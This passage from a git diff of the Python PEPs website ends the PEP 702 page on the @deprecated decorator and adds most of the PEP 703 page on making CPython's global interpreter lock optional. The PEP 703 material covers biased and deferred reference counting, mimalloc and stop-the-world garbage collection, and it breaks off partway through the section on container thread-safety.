For users who encounter deprecation warnings in their IDE or type +checker output, the messages they receive should be clear and self-explanatory. +Usage of the @deprecated decorator will be an advanced feature +mostly relevant to library authors. The decorator should be mentioned +in relevant documentation (e.g., PEP 387 and the DeprecationWarning +documentation) as an additional way to mark deprecated functionality.

+
+
+

Reference implementation

+

A runtime implementation of the @deprecated decorator is +available in the typing-extensions +library since version 4.5.0. +The pyanalyze type checker has +prototype support +for emitting deprecation errors, as does +Pyright.

+
+
+

Rejected ideas

+
+

Deprecation of modules and attributes

+

This PEP covers deprecations of classes, functions and overloads. This +allows type checkers to detect many but not all possible deprecations. +To evaluate whether additional functionality would be worthwhile, I +examined +all current deprecations in the CPython standard library.

+

I found:

+
    +
  • 74 deprecations of functions, methods and classes (supported by this PEP)
  • +
  • 28 deprecations of whole modules (largely due to PEP 594)
  • +
  • 9 deprecations of function parameters (supported by this PEP through +decorating overloads)
  • +
  • 1 deprecation of a constant
  • +
  • 38 deprecations that are not easily detectable in the type system (for +example, for calling asyncio.get_event_loop() without an active +event loop)
  • +
+

Modules could be marked as deprecated by adding a __deprecated__ +module-level constant. However, the need for this is limited, and it +is relatively easy to detect usage of deprecated modules simply by +grepping. Therefore, this PEP omits support for whole-module deprecations. +As a workaround, users could mark all module-level classes and functions +with @deprecated.

+

For deprecating module-level constants, object attributes, and function +parameters, a Deprecated[type, message] type modifier, similar to +Annotated could be added. However, this would create a new place +in the type system where strings are just strings, not forward references, +complicating the implementation of type checkers. In addition, my data +show that this feature is not commonly needed.

+

Features for deprecating more kinds of objects could be added in a future +PEP.

+
+
+

Placing the decorator in the typing module

+

An earlier version of this PEP proposed placing the @deprecated +decorator in the typing module. However, there was feedback +that it would be unexpected for a decorator in the typing module +to have runtime behavior. Therefore, the PEP now proposes adding the +decorator the warnings module instead.

+
+
+
+

Acknowledgments

+

A call with the typing-sig meetup group led to useful feedback on this +proposal.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0702.rst

+

Last modified: 2024-10-16 16:05:18 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0703/index.html b/pep-0703/index.html new file mode 100644 index 00000000000..2a5ca15ca32 --- /dev/null +++ b/pep-0703/index.html @@ -0,0 +1,2030 @@ + + + + + + + + PEP 703 – Making the Global Interpreter Lock Optional in CPython | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 703 – Making the Global Interpreter Lock Optional in CPython

+
+
Author:
+
Sam Gross <colesbury at gmail.com>
+
Sponsor:
+
Łukasz Langa <lukasz at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Created:
+
09-Jan-2023
+
Python-Version:
+
3.13
+
Post-History:
+
09-Jan-2023, +04-May-2023
+
Resolution:
+
24-Oct-2023
+
+
+
+
Table of Contents +
+
+

Note

+

The Steering Council accepts PEP 703, but with clear proviso: that +the rollout be gradual and break as little as possible, and that we can roll +back any changes that turn out to be too disruptive – which includes +potentially rolling back all of PEP 703 entirely if necessary +(however unlikely or undesirable we expect that to be).

+
+
+

Abstract

+

CPython’s global interpreter lock (“GIL”) prevents multiple threads +from executing Python code at the same time. The GIL is an obstacle +to using multi-core CPUs from Python efficiently. This PEP proposes +adding a build configuration (--disable-gil) to CPython to let it +run Python code without the global interpreter lock and with the +necessary changes needed to make the interpreter thread-safe.

+
+
+

Motivation

+

The GIL is a major obstacle to concurrency. For scientific computing +tasks, this lack of concurrency is often a bigger issue than speed of +executing Python code, since most of the processor cycles are spent +in optimized CPU or GPU kernels. The GIL introduces a global +bottleneck that can prevent other threads from making progress if +they call any Python code. There are existing ways to enable +parallelism in CPython today, but those techniques come with +significant limitations (see Alternatives).

+

This section focuses on the GIL’s impact on scientific computing, +particular AI/ML workloads because that is the area with which this +author has the most experience, but the GIL also affects other users +of Python.

+
+

The GIL Makes Many Types of Parallelism Difficult to Express

+

Neural network-based AI models expose multiple opportunities for +parallelism. For example, individual operations may be parallelized +internally (“intra-operator”), multiple operations may be executed +simultaneously (“inter-operator”), and requests (spanning multiple +operations) may also be parallelized. Efficient execution requires +exploiting multiple types of parallelism [1].

+

The GIL makes it difficult to express inter-operator parallelism, as +well as some forms of request parallelism, efficiently in Python. In +other programming languages, a system might use threads to run +different parts of a neural network on separate CPU cores, but this is +inefficient in Python due to the GIL. Similarly, latency-sensitive +inference workloads frequently use threads to parallelize across +requests, but face the same scaling bottlenecks in Python.

+

The challenges the GIL poses to exploiting parallelism in Python +frequently come up in reinforcement learning. Heinrich Kuttler, +author of the NetHack Learning Environment and Member of Technical +Staff at Inflection AI, writes:

+
+
Recent breakthroughs in reinforcement learning, such as on Dota +2, StarCraft, and NetHack rely on running multiple +environments (simulated games) in parallel using asynchronous +actor-critic methods. Straightforward multithreaded implementations +in Python don’t scale beyond more than a few parallel environments +due to GIL contention. Multiprocessing, with communication via +shared memory or UNIX sockets, adds much complexity and in effect +rules out interacting with CUDA from different workers, severely +restricting the design space.
+

Manuel Kroiss, software engineer at DeepMind on the reinforcement +learning team, describes how the bottlenecks posed by the GIL lead to +rewriting Python codebases in C++, making the code less accessible:

+
+
We frequently battle issues with the Python GIL at DeepMind. In many +of our applications, we would like to run on the order of 50-100 +threads per process. However, we often see that even with fewer +than 10 threads the GIL becomes the bottleneck. To work around this +problem, we sometimes use subprocesses, but in many cases the +inter-process communication becomes too big of an overhead. To +deal with the GIL, we usually end up translating large parts of our +Python codebase into C++. This is undesirable because it makes the +code less accessible to researchers.
+

Projects that involve interfacing with multiple hardware devices face +similar challenges: efficient communication requires use of multiple +CPU cores. The Dose-3D project aims to improve cancer +radiotherapy with precise dose planning. It uses medical phantoms +(stand-ins for human tissue) together with custom hardware and a +server application written in Python. Paweł Jurgielewicz, lead +software architect for the data acquisition system on the Dose-3D +project, describes the scaling challenges posed by the GIL and how +using a fork of Python without the GIL simplified the project:

+
+
In the Dose-3D project, the key challenge was to maintain a stable, +non-trivial concurrent communication link with hardware units while +utilizing a 1 Gbit/s UDP/IP connection to the maximum. Naturally, +we started with the multiprocessing package, but at some point, it +became clear that most CPU time was consumed by the data transfers +between the data processing stages, not by data processing itself. +The CPython multithreading implementation based on GIL was a dead +end too. When we found out about the “nogil” fork of Python it took +a single person less than half a working day to adjust the codebase +to use this fork and the results were astonishing. Now we can focus +on data acquisition system development rather than fine-tuning data +exchange algorithms.
+

Allen Goodman, author of CellProfiler and staff engineer at +Prescient Design and Genentech, describes how the GIL makes +biological methods research more difficult in Python:

+
+
Issues with Python’s global interpreter lock are a frequent source +of frustration throughout biological methods research.

I wanted to better understand the current multithreading situation +so I reimplemented parts of HMMER, a standard method for +multiple-sequence alignment. I chose this method because it +stresses both single-thread performance (scoring) and +multi-threaded performance (searching a database of sequences). The +GIL became the bottleneck when using only eight threads. This is a +method where the current popular implementations rely on 64 or +even 128 threads per process. I tried moving to subprocesses but +was blocked by the prohibitive IPC costs. HMMER is a relatively +elementary bioinformatics method and newer methods have far bigger +multi-threading demands.

+

Method researchers are begging to use Python (myself included), +because of its ease of use, the Python ecosystem, and because “it’s +what people know.” Many biologists only know a little bit of +programming (and that’s almost always Python). Until Python’s +multithreading situation is addressed, C and C++ will remain the +lingua franca of the biological methods research community.

+
+
+
+

The GIL Affects Python Library Usability

+

The GIL is a CPython implementation detail that limits multithreaded +parallelism, so it might seem unintuitive to think of it as a +usability issue. However, library authors frequently care a great +deal about performance and will design APIs that support working +around the GIL. These workaround frequently lead to APIs that are +more difficult to use. Consequently, users of these APIs may +experience the GIL as a usability issue and not just a performance +issue.

+

For example, PyTorch exposes a multiprocessing-based API called +DataLoader for building data input pipelines. It uses fork() +on Linux because it is generally faster and uses less memory +than spawn(), but this leads to additional challenges for users: +creating a DataLoader after accessing a GPU can lead to confusing +CUDA errors. Accessing GPUs within a DataLoader worker quickly +leads to out-of-memory errors because processes do not share CUDA +contexts (unlike threads within a process).

+

Olivier Grisel, scikit-learn developer and software engineer at Inria, +describes how having to work around the GIL in scikit-learn related +libraries leads to a more complex and confusing user experience:

+
+
Over the years, scikit-learn developers have maintained ancillary +libraries such as joblib and loky to try to work around some +of the limitations of multiprocessing: extra memory usage partially +mitigated via semi-automated memory mapping of large data buffers, +slow worker startup by transparently reusing a pool of long +running workers, fork-safety problems of third-party native runtime +libraries such as GNU OpenMP by never using the fork-only +start-method, ability to perform parallel calls of interactively +defined functions in notebooks and REPLs in cross-platform manner +via cloudpickle. Despite our efforts, this multiprocessing-based +solution is still brittle, complex to maintain and confusing to +datascientists with limited understanding of system-level +constraints. Furthermore, there are still irreducible limitations +such as the overhead caused by the pickle-based +serialization/deserialization steps required for inter-process +communication. A lot of this extra work and complexity would not be +needed anymore if we could use threads without contention on +multicore hosts (sometimes with 64 physical cores or more) to run +data science pipelines that alternate between Python-level +operations and calls to native libraries.
+

Ralf Gommers, co-director of Quansight Labs and NumPy and SciPy +maintainer, describes how the GIL affects the user experience of +NumPy and numeric Python libraries:

+
+
A key problem in NumPy and the stack of packages built around it is +that NumPy is still (mostly) single-threaded — and that has shaped +significant parts of the user experience and projects built around +it. NumPy does release the GIL in its inner loops (which do the +heavy lifting), but that is not nearly enough. NumPy doesn’t offer +a solution to utilize all CPU cores of a single machine well, and +instead leaves that to Dask and other multiprocessing solutions. +Those aren’t very efficient and are also more clumsy to use. That +clumsiness comes mainly in the extra abstractions and layers the +users need to concern themselves with when using, e.g., +dask.array which wraps numpy.ndarray. It also shows up in +oversubscription issues that the user must explicitly be aware of +and manage via either environment variables or a third package, +threadpoolctl. The main reason is that NumPy calls into BLAS +for linear algebra - and those calls it has no control over, they +do use all cores by default via either pthreads or OpenMP.

Coordinating on APIs and design decisions to control parallelism is +still a major amount of work, and one of the harder challenges +across the PyData ecosystem. It would have looked a lot different +(better, easier) without a GIL.

+
+
+
+

GPU-Heavy Workloads Require Multi-Core Processing

+

Many high-performance computing (HPC) and AI workloads make heavy use +of GPUs. These applications frequently require efficient multi-core +CPU execution even though the bulk of the computation runs on a GPU.

+

Zachary DeVito, PyTorch core developer and researcher at FAIR +(Meta AI), describes how the GIL makes multithreaded scaling +inefficient even when the bulk of computation is performed outside of +Python:

+
+
In PyTorch, Python is commonly used to orchestrate ~8 GPUs and ~64 +CPU threads, growing to 4k GPUs and 32k CPU threads for big models. +While the heavy lifting is done outside of Python, the speed of +GPUs makes even just the orchestration in Python not scalable. We +often end up with 72 processes in place of one because of the GIL. +Logging, debugging, and performance tuning are orders-of-magnitude +more difficult in this regime, continuously causing lower developer +productivity.
+

The use of many processes (instead of threads) makes common tasks more +difficult. Zachary DeVito continues:

+
+
On three separate occasions in the past couple of months +(reducing redundant compute in data loaders, writing model +checkpoints asynchronously, and parallelizing compiler +optimizations), I spent an order-of-magnitude more time figuring +out how to work around GIL limitations than actually solving the +particular problem.
+

Even GPU-heavy workloads frequently have a CPU-intensive component. +For example, computer vision tasks typically require +multiple “pre-processing” steps in the data input pipeline, like +image decoding, cropping, and resizing. These tasks are commonly +performed on the CPU and may use Python libraries like Pillow +or Pillow-SIMD. It is necessary to run the data input pipeline +on multiple CPU cores in order to keep the GPU “fed” with data.

+

The increase in GPU performance compared to individual CPU cores makes +multi-core performance more important. It is progressively more +difficult to keep the GPUs fully occupied. To do so requires efficient +use of multiple CPU cores, especially on multi-GPU systems. For +example, NVIDIA’s DGX-A100 has 8 GPUs and two 64-core CPUs in order to +keep the GPUs “fed” with data.

+
+
+

The GIL Makes Deploying Python AI Models Difficult

+

Python is widely used to develop neural network-based AI models. In +PyTorch, models are frequently deployed as part of multi-threaded, +mostly C++, environments. Python is often viewed skeptically +because the GIL can be a global bottleneck, preventing efficient +scaling even though the vast majority of the computations +occur “outside” of Python with the GIL released. The torchdeploy +paper [2] shows experimental evidence for these scaling +bottlenecks in multiple model architectures.

+

PyTorch provides a number of mechanisms for deploying Python AI +models that avoid or work around the GIL, but they all come with +substantial limitations. For example, TorchScript captures a +representation of the model that can be executed from C++ without any +Python dependencies, but it only supports a limited subset of Python +and often requires rewriting some of the model’s code. The +torch::deploy API +allows multiple Python interpreters, each with its own GIL, in the +same process(similar to PEP 684). However, torch::deploy has +limited support for Python modules that use C-API extensions.

+
+
+

Motivation Summary

+

Python’s global interpreter lock makes it difficult to use modern +multi-core CPUs efficiently for many scientific and numeric computing +applications. Heinrich Kuttler, Manuel Kroiss, and Paweł +Jurgielewicz found that multi-threaded implementations in Python did +not scale well for their tasks and that using multiple processes +was not a suitable alternative.

+

The scaling bottlenecks are not solely in core numeric tasks. Both +Zachary DeVito and Paweł Jurgielewicz described challenges with +coordination and communication in Python.

+

Olivier Grisel, Ralf Gommers, and Zachary DeVito described how current +workarounds for the GIL are “complex to maintain” and cause “lower +developer productivity.” The GIL makes it more difficult to develop +and maintain scientific and numeric computing libraries as well +leading to library designs that are more difficult to use.

+
+
+
+

Specification

+
+

Build Configuration Changes

+

The global interpreter lock will remain the default for CPython builds +and python.org downloads. A new build configuration flag, +--disable-gil will be added to the configure script that will build +CPython with support for running without the global interpreter lock.

+

When built with --disable-gil, CPython will define the Py_GIL_DISABLED +macro in Python/patchlevel.h. The ABI tag will include the letter “t” +(for “threading”).

+

The --disable-gil builds of CPython will still support optionally +running with the GIL enabled at runtime (see PYTHONGIL Environment +Variable and Py_mod_gil Slot).

+
+
+

Overview of CPython Changes

+

Removing the global interpreter lock requires substantial changes to +CPython internals, but relatively few changes to the public Python +and C APIs. This section describes the required changes to the +CPython implementation followed by the proposed API changes.

+

The implementation changes can be grouped into the following four +categories:

+
    +
  • Reference counting
  • +
  • Memory management
  • +
  • Container thread-safety
  • +
  • Locking and atomic APIs
  • +
+
+
+

Reference Counting

+

Removing the GIL requires changes to CPython’s +reference counting implementation to make it thread-safe. +Furthermore, it needs to have low execution overhead and allow for +efficient scaling with multiple threads. This PEP proposes a +combination of three techniques to address these constraints. The +first is a switch from plain non-atomic reference counting to biased +reference counting, which is a thread-safe reference counting +technique with lower execution overhead than plain atomic reference +counting. The other two techniques are immortalization and a limited +form of deferred reference counting; they address some of the +multi-threaded scalability issues with reference counting by avoiding +some reference count modifications.

+

Biased reference counting (BRC) is a technique first described in 2018 +by Jiho Choi, Thomas Shull, and Josep Torrellas [3]. It is based on the +observation that most objects are only accessed by a single thread, +even in multi-threaded programs. Each object is associated with an +owning thread (the thread that created it). Reference counting +operations from the owning thread use non-atomic instructions to +modify a “local” reference count. Other threads use atomic +instructions to modify a “shared” reference count. This design avoids +many atomic read-modify-write operations that are expensive on +contemporary processors.

+

The implementation of BRC proposed in this PEP largely matches the +original description of biased reference counting, but differs in +details like the size of reference counting fields and special bits in +those fields. BRC requires storing three pieces of information in each +object’s header: the “local” reference count, the “shared” reference +count, and the identifier of the owning thread. The BRC paper packs +these three things into a single 64-bit field. This PEP proposes using +three separate fields in each object’s header to avoid potential issues +due to reference count overflow. Additionally, the PEP supports a +faster deallocation path that avoids an atomic operation in the common +case.

+

The proposed PyObject struct (also called struct _object) is +below:

+
struct _object {
+  _PyObject_HEAD_EXTRA
+  uintptr_t ob_tid;         // owning thread id (4-8 bytes)
+  uint16_t __padding;       // reserved for future use (2 bytes)
+  PyMutex ob_mutex;         // per-object mutex (1 byte)
+  uint8_t ob_gc_bits;       // GC fields (1 byte)
+  uint32_t ob_ref_local;    // local reference count (4 bytes)
+  Py_ssize_t ob_ref_shared; // shared reference count and state bits (4-8 bytes)
+  PyTypeObject *ob_type;
+};
+
+
+

The ob_tid, ob_ref_local, and ob_ref_shared are used by +the biased reference counting implementation. The ob_gc_bits field +is used store garbage collection flags that were previously stored in +PyGC_Head (see Garbage Collection (Cycle Collection)). The +ob_mutex field provides a per-object lock in a single byte.

+
+

Immortalization

+

Some objects, such as interned strings, small integers, statically +allocated PyTypeObjects, and the True, False, and None +objects stay alive for the lifetime of the program. These objects are +marked as immortal by setting the local reference count field +(ob_ref_local) to UINT32_MAX.

+

The Py_INCREF and Py_DECREF macros are no-ops for immortal +objects. This avoids contention on the reference count fields of +these objects when multiple threads access them concurrently.

+

This proposed immortalization scheme is very similar to PEP 683, +adopted in Python 3.12, but with slightly different bit representation +in the reference count fields for immortal objects in order to work +with biased reference counting and deferred reference counting. See +also Why Not Use PEP 683 Immortalization?.

+
+
+

Biased Reference Counting

+

Biased reference counting has a fast-path for objects “owned” by the +current thread and a slow-path for other objects. Ownership is +indicated by the ob_tid field. Determining the thread id requires +platform specific code [5]. A value of 0 in ob_tid +indicates that the object is not owned by any thread.

+

The ob_ref_local field stores the local reference count and two +flags. The two most significant bits are used to indicate the object +is immortal or uses deferred reference counting (see Deferred +reference counting).

+

The ob_ref_shared field stores the shared reference count. The +two least significant bits are used to store the reference +counting state. The shared reference count is therefore shifted left by +two. The ob_ref_shared field uses the least significant bits +because the shared reference count can be temporarily negative; increfs +and decrefs may not be balanced between threads.

+

The possible reference counting states are listed below:

+
    +
  • 0b00 - default
  • +
  • 0b01 - weakrefs
  • +
  • 0b10 - queued
  • +
  • 0b11 - merged
  • +
+

The states form a progression: during their lifecycle, objects may +transition to any numerically higher state. Objects can only be +deallocated from the “default” and “merged” states. Other states must +transition to the “merged” state before deallocation. Transitioning +states requires an atomic compare-and-swap on the ob_ref_shared +field.

+
+
Default (0b00)
+

Objects are initially created in the default state. This is the only +state that allows for the quick deallocation code path. Otherwise, the +thread must merge the local and shared reference count fields, which +requires an atomic compare-and-swap.

+

This quick deallocation code path would not be thread-safe with +concurrent dereferencing of weakrefs, so the first time a weak +reference is created, the object is transitioned to the “weakrefs” +state if it is currently in the “default” state.

+

Similarly, the quick deallocation code path would not be thread-safe +with the lockless list and dictionary accesses (see Optimistically +Avoiding Locking), so the first time a non-owning thread thread +attempts to retrieve an object in the “default” state it falls back to +the slower locking code path and transitions the object to +the “weakrefs” state.

+
+
+
Weakrefs (0b01)
+

Objects in weakref and higher states support dereferencing weakrefs +as well as the lockless list and dictionary access by non-owning +threads. They require transitioning to the merged state before +deallocation, which is more expensive than the quick deallocation code +path supported by the “default” state.

+
+
+
Queued (0b10)
+

The queued state indicates that the a non-owning thread has requested +that the reference count fields be merged. This can happen when the +shared reference count becomes negative (due to an imbalance between +increfs and decrefs between threads). The object is inserted into the +owning thread’s queue of objects to be merged. The owning thread is +notified via the eval_breaker mechanism. In practice, this +operation is rare. Most objects are only accessed by a single thread +and those objects accessed by multiple threads rarely have negative +shared reference counts.

+

If the owning thread has terminated, the acting thread immediately +merges the local and shared reference count fields and transitions to +the merged state.

+
+
+
Merged (0b11)
+

The merged state indicates that the object is not owned by any thread. +The ob_tid field is zero in this state and ob_ref_local is not +used. Once the shared reference count reaches zero, the object can +be deallocated from the merged state.

+
+
+
Reference counting pseudo-code
+

The proposed Py_INCREF and Py_DECREF operation should behave +as follows (using C-like pseudo-code):

+
// low two bits of "ob_ref_shared" are used for flags
+#define _Py_SHARED_SHIFT 2
+
+void Py_INCREF(PyObject *op)
+{
+  uint32_t new_local = op->ob_ref_local + 1;
+  if (new_local == 0)
+    return;  // object is immortal
+  if (op->ob_tid == _Py_ThreadId())
+    op->ob_ref_local = new_local;
+  else
+    atomic_add(&op->ob_ref_shared, 1 << _Py_SHARED_SHIFT);
+}
+
+void Py_DECREF(PyObject *op)
+{
+  if (op->ob_ref_local == _Py_IMMORTAL_REFCNT) {
+    return;  // object is immortal
+  }
+  if (op->ob_tid == _Py_ThreadId()) {
+    op->ob_ref_local -= 1;
+    if (op->ob_ref_local == 0) {
+      _Py_MergeZeroRefcount(); // merge refcount
+    }
+  }
+  else {
+    _Py_DecRefShared(); // slow path
+  }
+}
+
+void _Py_MergeZeroRefcount(PyObject *op)
+{
+  if (op->ob_ref_shared == 0) {
+    // quick deallocation code path (common case)
+    op->ob_tid = 0;
+    _Py_Dealloc(op);
+  }
+  else {
+    // slower merging path not shown
+  }
+}
+
+
+

The reference implementation [17] contains implementations of +_Py_MergeZeroRefcount and _Py_DecRefShared.

+

Note that the above is pseudocode: in practice, the implementation +should use “relaxed atomics” to access ob_tid and +ob_ref_local to avoid undefined behavior in C and C++.

+
+
+
+

Deferred Reference Counting

+

A few types of objects, such as top-level functions, code objects, +modules, and methods, tend to be frequently accessed by many threads +concurrently. These objects don’t necessarily live for the lifetime of +the program, so immortalization is not a good fit. This PEP proposes a +limited form of deferred reference counting to avoid contention on +these objects’ reference count fields in multi-threaded programs.

+

Typically, the interpreter modifies objects’ reference counts as they +are pushed to and popped from the interpreter’s stack. The +interpreter skips these reference counting operations for objects +that use deferred reference counting. Objects that support deferred +reference counting are marked by setting the two most significant +bits in the local reference count field to one.

+

Because some reference counting operations are skipped, the reference +count fields no longer reflect the true number of references to these +objects. The true reference count is the sum of the reference count +fields plus any skipped references from each thread’s interpreter +stack. The true reference count can only be safely computed when all +threads are paused during cyclic garbage collection. Consequently, +objects that use deferred reference counting can only be deallocated +during garbage collection cycles.

+

Note that the objects that use deferred reference counting already +naturally form reference cycles in CPython, so they would typically be +deallocated by the garbage collector even without deferred reference +counting. For example, top-level functions and modules form a reference +cycle as do methods and type objects.

+
+
+

Garbage Collector Modifications for Deferred Reference Counting

+

The tracing garbage collector finds and deallocates unreferenced +objects. Currently, the tracing garbage collector only finds +unreferenced objects that are part of a reference cycle. With +deferred reference counting, the tracing garbage collector will also +find and collect some unreferenced objects that may not be part of +any reference cycle, but whose collection has been delayed due to +deferred reference counting. This requires that all objects that +support deferred reference counting also have a corresponding type +object that supports tracing garbage collection (through the +Py_TPFLAGS_HAVE_GC flag). Additionally, the garbage collector +will need to traverse each thread’s stack to add references to the GC +reference count at the start of each collection.

+
+
+

Reference Counting Type Objects

+

Type objects (PyTypeObject) use a mix of reference counting +techniques. Statically allocated type objects are immortalized because +the objects already live for the lifetime of the program. Heap type +objects use deferred reference counting in combination with per-thread +reference counting. Deferred reference counting is not sufficient to +address the multi-threaded scaling bottlenecks with heap types because +most references to heap types are from object instances, not references +on the interpreter stack.

+

To address this, heap type reference counts are partially stored in a +distributed manner in per-thread arrays. Every thread stores an +array of local reference counts for each heap type object. Heap type +objects are assigned a unique number that determines its position in +the local reference count arrays. A heap type’s true reference count +is the sum of its entries in the per-thread arrays, plus the reference +count on the PyTypeObject, plus any deferred references in the +interpreter stack.

+

Threads may grow their own type reference count arrays as needed when +incrementing or decrementing the local reference count of a type +object.

+

Use of the per-thread reference count arrays is limited to a few +places:

+
    +
  • PyType_GenericAlloc(PyTypeObject *type, Py_ssize_t nitems): +Increments the current thread’s local reference count for type, +if it is a heap type.
  • +
  • subtype_dealloc(PyObject *self): Decrements the current thread’s +local reference count for self->ob_type, if the type is a heap +type.
  • +
  • gcmodule.c: Adds each thread’s local reference counts to the +gc_refs count for the corresponding heap type object.
  • +
+

Additionally, when a thread terminates, it adds any non-zero local +reference counts to each type object’s own reference count field.

+
+
+
+

Memory Management

+

CPython currently uses an internal allocator, pymalloc, which is +optimized for small object allocation. The pymalloc implementation is +not thread-safe without the GIL. This PEP proposes replacing pymalloc +with mimalloc, a general-purpose thread-safe allocator with good +performance, including for small allocations.

+

Using mimalloc, with some modifications, also addresses two other +issues related to removing the GIL. First, traversing the internal +mimalloc structures allows the garbage collector to find all Python +objects without maintaining a linked list. This is described in more +detail in the garbage collection section. Second, mimalloc heaps and +allocations based on size class enable collections like dict to +generally avoid acquiring locks during read-only operations. This is +described in more detail in the collection thread-safety section.

+

CPython already requires that objects that support garbage collection +use the GC allocator APIs (typically indirectly by calling +PyType_GenericAlloc). This PEP would add additional requirements +to the use of the Python allocator APIs. First, Python objects must +be allocated through object allocation APIs, such as +PyType_GenericAlloc, PyObject_Malloc, or other Python APIs +that wrap those calls. Python objects should not be allocated through +other APIs, such as raw calls to C’s malloc or the C++ new operator. +Additionally, PyObject_Malloc should be used only for allocating +Python objects; it should not be used for allocating buffers, +storages, or other data structures that are not PyObjects.

+

This PEP also imposes restrictions on the pluggable allocator API +(PyMem_SetAllocator). When compiling without the GIL, allocators +set using this API must eventually delegate the allocation to the +corresponding underlying allocator, such as PyObject_Malloc, for +Python object allocations. This allows for allocators that “wrap” +underlying allocators, such as Python’s tracemalloc and debug +allocator, but not for wholly replacing the allocator.

+
+

CPython Free Lists

+

CPython makes use of free lists to speed up the allocation of small, +frequently allocated objects like tuples and numbers. These free +lists are moved to PyThreadState from per-interpreter state.

+
+
+
+

Garbage Collection (Cycle Collection)

+

The CPython garbage collector requires the following changes to work +with this proposal:

+
    +
  • Use of “stop-the-world” to provide thread-safety guarantees that +were previously provided by the GIL.
  • +
  • Elimination of generational garbage collection in favor of +non-generational collector.
  • +
  • Integration with deferred reference counting and biased reference +counting.
  • +
+

Additionally, the above changes enable removing the +_gc_prev and _gc_next fields from GC objects. The GC bits +that stored the tracked, finalized, and unreachable states are moved +to the ob_gc_bits field in the PyObject header.

+
+

Stop-the-World

+

The CPython cycle garbage collector currently relies on the global +interpreter lock to prevent other threads from accessing Python +objects while the collector finds cycles. The GIL is never released +during the cycle-finding routine, so the collector can rely on +stable (i.e., unchanging) reference counts and references for the +duration of that routine. However, following cycle detection, the GIL +may be temporarily released while calling objects’ finalizers and +clear (tp_clear) functions, allowing other threads to run in an +interleaved fashion.

+

When running without the GIL, the implementation needs a way to ensure +that reference counts remain stable during cycle detection. Threads +running Python code must be paused to ensure that references and +reference counts remain stable. Once the cycles are identified, other +threads are resumed.

+

The current CPython cyclic garbage collector involves two +cycle-detection passes during each garbage collection cycle. +Consequently, this requires two stop-the-world pauses when running the +garbage collector without the GIL. The first cycle-detection pass +identifies cyclic trash. The second pass runs after finalizers to +identify which objects still remain unreachable. Note that other +threads are resumed before finalizers and tp_clear functions are +called to avoid introducing potential deadlocks that are not present in +the current CPython behavior.

+
+
+

Thread States

+

To support pausing threads for garbage collection, the PyThreadState +gets a new “status” field. Like the other fields in PyThreadState, +the status field is not part of the public CPython API. The status +field may be in one of three states:

+
    +
  • ATTACHED
  • +
  • DETACHED
  • +
  • GC
  • +
+

The ATTACHED and DETACHED states correspond closely to +acquiring and releasing the global interpreter lock. When compiling +without the GIL, functions that previously acquired the GIL instead +transition the thread state to ATTACHED, and functions that +previously released the GIL transition the thread state +to DETACHED. Just as threads previously needed to acquire the +GIL before accessing or modifying Python objects, they now must be in +the ATTACHED state before accessing or modifying Python +objects. Since the same public C-API functions “attach” the thread as +previously acquired the GIL (e.g., PyEval_RestoreThread), the +requirements for thread initialization in extensions remain the same. +The substantial difference is that multiple threads can be in the +attached state simultaneously, while previously only one thread could +acquire the GIL at a time.

+

During stop-the-world pauses, the thread performing garbage collection +needs to ensure that no other thread is accessing or modifying Python +objects. All other threads must be in the “GC” state. The garbage +collection thread can transition other threads from the DETACHED +state to the GC state using an atomic compare-and-swap operation on +the status field. Threads in the ATTACHED state are requested to +pause themselves and set their status to “GC”, using the +existing “eval breaker” mechanism. At the end of the stop-the-world +pause, all threads in the “GC” state are set to DETACHED and +woken up if they are paused. Threads that were previously attached +(i.e., executing Python bytecode) can re-attach (set their thread +states to ATTACHED) and resume executing Python code. Threads +that were previously DETACHED ignore the notification.

+
+
+

Generations

+

The existing Python garbage collector uses three generations. When +compiling without the GIL, the garbage collector will only use a single +generation (i.e., it will be non-generational). The primary reason for +this change is to reduce the impact of the stop-the-world pauses in +multithreaded applications. Frequent stop-the-world pauses for +collecting the young generation would have more of an impact on +multi-threaded applications than less frequent collections.

+
+
+

Integration With Deferred and Biased Reference Counting

+

To find unreferenced objects, the cyclic garbage collector computes +the difference between the number of incoming references and the +object’s reference count. This difference is called gc_refs and +is stored in the _gc_prev field. If gc_refs is greater than +zero, then the object is guaranteed to be alive (i.e., not cyclic +trash). If gc_refs is zero, then the object is only alive if it +is transitively referenced by another live object. When computing +this difference, the collector should traverse each thread’s stack, +and for every deferred reference, increment the gc_refs for the +referred object. Since generator objects also have stacks with +deferred references, the same procedure is applied to each +generator’s stack.

+

Python unit tests commonly use gc.collect() to ensure that any +unreferenced objects are destructed and their finalizers run. Since +biased reference counting can delay the destruction of some objects +that are referenced by multiple threads, it’s convenient to ensure +that those objects are destructed during garbage collection, even +though they may not be part of any reference cycles. While other +threads are paused, the garbage collector thread should merge the +reference counts for any queued objects, but not call any destructors +even if the combined reference count is zero. (Calling destructors +while other threads are paused risks introducing deadlocks.) Once +other threads are resumed, the GC thread should call _Py_Dealloc +on those objects with a zero merged reference count.

+
+
+
+

Container Thread-Safety

+

In CPython, the global interpreter lock protects against corruption of +internal interpreter states when multiple threads concurrently access +or modify Python objects. For example, if multiple threads +concurrently modify the same list, the GIL ensures that the length of +the list (ob_size) accurately matches the number of elements, and +that the reference counts of each element accurately reflect the +number of references to those elements. Without the GIL — and +absent other changes — concurrent modifications would corrupt those +fields and likely lead to program crashes.

+

The GIL does not necessarily ensure that operations are atomic or +remain correct when multiple operations occur concurrently. For +example, list.extend(iterable) may not appear atomic if the +iterable has an iterator implemented in Python (or releases the GIL +internally). Similarly, list.remove(x) can remove the wrong +object if it overlaps with another operation that modifies the list, +depending on the implementation of the equality operator. Still, the +GIL ensures that some operations are effectively atomic. For example, +the constructor list(set) atomically copies the items of the set +to a new list, and some code relies on that copy being atomic +(i.e., having a snapshot of the items in the set). This PEP preserves +that property.

+

This PEP proposes using per-object locks to provide many of the same +protections that the GIL provides. For example, every list, +dictionary, and set will have an associated lightweight lock. All +operations that modify the object must hold the object’s lock. Most +operations that read from the object should acquire the object’s lock +as well; the few read operations that can proceed without holding a +lock are described below.

+

